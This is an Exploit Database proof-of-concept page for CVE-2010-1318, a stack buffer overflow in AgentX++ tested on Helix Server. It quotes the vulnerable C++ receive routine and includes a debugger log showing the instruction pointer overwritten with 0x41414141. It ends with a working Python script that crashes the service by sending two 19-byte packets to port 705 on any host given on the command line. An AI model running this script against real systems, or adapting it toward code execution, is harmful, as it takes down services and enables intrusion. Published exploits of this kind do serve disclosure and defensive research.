Multiple Vendor AgentX++ – Stack Buffer Overflow (PoC)

• Exploit Database
• 103 阅读

• 作者： ZSploit.com
  日期： 2010-04-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12274/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126

  # Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow Vulnerability # Date: 2010-04-17 # Author: ZSploit.com # Software Link: N/A # Version: N/A # Tested on: RealNetworks Helix Server v11 # CVE : CVE-2010-1318   #! /usr/bin/env python ############################################################################### ## File :zs_agentx_bof.py ## Description: ##: ## Created_On :Apr 17 2010 ## ## (c) Copyright 2010, ZSploit.com. all rights reserved. ############################################################################### """ int AgentX::receive_agentx(int sd, AgentXPdu& pdu) {   u_charbuffer[AGENTX_HEADER_LEN+1];[1] u_intpayloadLen; booleannetByteOrder; intstatus;   //read header unsigned int bytesRead = 0; while (bytesRead < AGENTX_HEADER_LEN) { [2] #ifdef WIN32 if ((status = recv(sd, (char*)(buffer+bytesRead), AGENTX_HEADER_LEN, 0)) <= 0) {   if (status == 0) return AGENTX_DISCONNECT; if (status == SOCKET_ERROR) { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive socket error (errno)"); LOG(WSAGetLastError()); LOG_END; return AGENTX_DISCONNECT; } else { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive unknown error (status)"); LOG(status); LOG_END; return AGENTX_DISCONNECT; } } #else if ((status = read(sd, (void *)(buffer+bytesRead), AGENTX_HEADER_LEN)) <= 0) {   if (status == 0) return AGENTX_DISCONNECT; if (errno == EBADF) return AGENTX_BADF; else { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive unknown error (errno)"); LOG(errno); LOG_END; return AGENTX_ERROR; } } #endif bytesRead += status; }     [1] Allocates 0x14 bytes stack buffer [2] The check should be consider the remainder bytes of the buffer   if we only send the data < 0x13 bytes, 2 packets will overwrite the stack buffer.   0:009> g (728.a3c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14 edi=00ccff80 eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 41414141 ????? *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\WINDOWS\system32\mswsock.dll - 0:006> k ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 00cbfd04 00edda20 0x41414141 00cbfd18 7c829fb5 0xedda20 00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38 00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126 00000000 00000000 mswsock+0x1a03   """   import sys import socket   if (len(sys.argv) != 2): print "Usage:\t%s [target]" % sys.argv[0] sys.exit(0)     data = "A" * 19   host = sys.argv[1] port = 705   print "PoC for CVE-2010-1318 by ZSploit.com" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) print "Sending payload .." s.send(data) s.send(data) except: print "Error in send" print "Done" except: print "Error in socket"